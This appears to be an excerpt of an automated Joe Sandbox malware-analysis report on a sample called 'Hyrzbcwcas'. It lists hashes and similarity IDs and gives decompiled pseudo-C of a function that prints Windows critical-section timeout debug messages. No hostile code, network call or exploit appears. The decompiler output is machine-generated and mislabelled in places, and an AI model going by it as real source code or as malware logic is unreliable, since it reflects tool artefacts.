                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                            • Instruction ID: b5498e74984cec40a2c6a38f7ece94c688bc02762c3818d5905e012efedaac04
                            • Opcode Fuzzy Hash: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                            • Instruction Fuzzy Hash: AFB092B29024D5CAEB51E7B04A08B2B7E04BBE6741F26C072E2020785B8778D491F6B6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00AFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                            Download Yara Rule
                            C-Code - Quality: 53%
                            			E00AFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                            0x00affdda
                            0x00affde2
                            0x00affde5
                            0x00affdec
                            0x00affdfa
                            0x00affdff
                            0x00affe0a
                            0x00affe0f
                            0x00affe17
                            0x00affe1e
                            0x00affe19
                            0x00affe19
                            0x00affe19
                            0x00affe20
                            0x00affe21
                            0x00affe22
                            0x00affe25
                            0x00affe40

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFFDFA
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AFFE01
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AFFE2B
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            • Opcode ID: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                            • Instruction ID: e48dd4179ea285de304f4e78694fd3cf748494568bc6589bbaec442085be3071
                            • Opcode Fuzzy Hash: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                            • Instruction Fuzzy Hash: FEF0F632640605BFEA201A95DD02F33BF6AEB45730F240714F728565E2EA62F82097F0
                            Uniqueness

                            Uniqueness Score: -1.00%